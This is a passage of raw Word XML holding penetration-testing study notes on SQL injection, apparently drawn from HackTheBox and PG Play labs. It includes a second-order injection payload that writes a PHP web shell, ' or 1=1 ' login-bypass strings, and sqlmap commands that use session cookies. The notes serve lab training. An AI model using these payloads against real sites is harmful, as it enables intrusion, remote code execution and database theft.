        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MariaDB and MySQL are almost the same and usually you can use MySQL tools for MariaDB</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000183D">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000183E">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">More about SQL Injections can be found in:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000183F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="364"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId504">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">InsanityHosting</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Play</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001840">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="364"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId505">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Robust</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841">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="364"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId506">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">MedJed</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842">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="364"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The Manual Code Execution Section (from XXXXXXXXX)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001843">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="364"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The Automated Code Execution Section (from XXXXXXXXX)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001844">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="364"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The Blind SQL Injection Section (from XXXXXXXXX)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001845">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001846">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">More SQLmap practice can be found in:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001847">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1055"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId507">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Butch</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848">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1055"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Dumping databases</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001849">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000184A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000184B">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Validation HTB</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> teaches us how to do 2nd order (second order) SQL injection, how to test for it, and how to get a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">web shell from a SQL injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000184C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1442"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Knowing that we can perform a Union Injection and that this is a PHP application, we can attempt to use the INTO OUTFILE statement of SQL to drop a web shell. We try injecting the following payload:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000184D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1442"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Brazil' UNION SELECT "&lt;?php SYSTEM($_REQUEST['cmd']); ?&gt;" INTO OUTFILE '/var/www/html/shell.php'-- -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000184E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1442"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Make sure to also visit the /account.php site after submitting the payload, since the query will not actually trigger until you try loading the page- hence, SQLi of the second order.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000184F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001850">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Usage HTB</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> also uses SQLMap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001851">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001852">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cronos HTB</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> uses SQL injection (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' or 1=1 -- -</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) to get into Admin login page!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001853">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001854">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Before, you try SQLMap, it's not a bad idea to test if it's vulnerable to SQL injections:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001855">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1000"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' or 1=1 -- -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001856">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1000"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">test' or 1=1;-- -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001857">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1000"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">More examples down below</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001858">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1000"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For example, in the Usage HTB, there was a password reset form, and it checked to see if your email was part of their records. If not, then it gave you an error message. So, we tried the above SQL injections and it gave a successful message, meaning that the SQL inject logic worked and we are allowed to SQL inject the input form. So, now we can use SQLMap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001859">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000185A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use SQLMap from Kali Linux to automate SQL injections. It's always a good first step for hacking into websites</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000185B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000185C">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you have HTTPS:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000185D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="780"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--force-ssl</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000185E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000185F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001860">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you want to use SQLMap but you already bypassed the login page, use a cookie:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001861">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1464"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap -u "http://target.com/restricted_page.php/search=*" --cookie="PHPSESSID=your_cookie"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001862">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1464"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If your GET/POST request looks like this: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /dashboard.php?search=carsss HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001863">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1464"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then you know that your URL should look like:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001864">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1464"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"http://[IP]/dashboard.php/search=*" </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001865">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1464"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The star helps SQLMap focus on that parameter for inject. If there are multiple parameters, then it will test all. But if you add the *, then it will only test that one</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001866">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1464"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So, if you only have one parameter, then it doesn't matter if you do a * or just put some random value like "carss"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001867">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1464"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Or use username and password:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001868">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1464"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap -u "http://target.com/restricted_page.php" --data="username=admin&amp;password=1234" --method=POST</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001869">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1464"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the POST request, make sure that "username" and "password" are actually called "username" and "password". If not, then change it to match the format of the request</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000186A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1464"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Make sure it's a POST. If not, get GET</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000186B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000186C">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
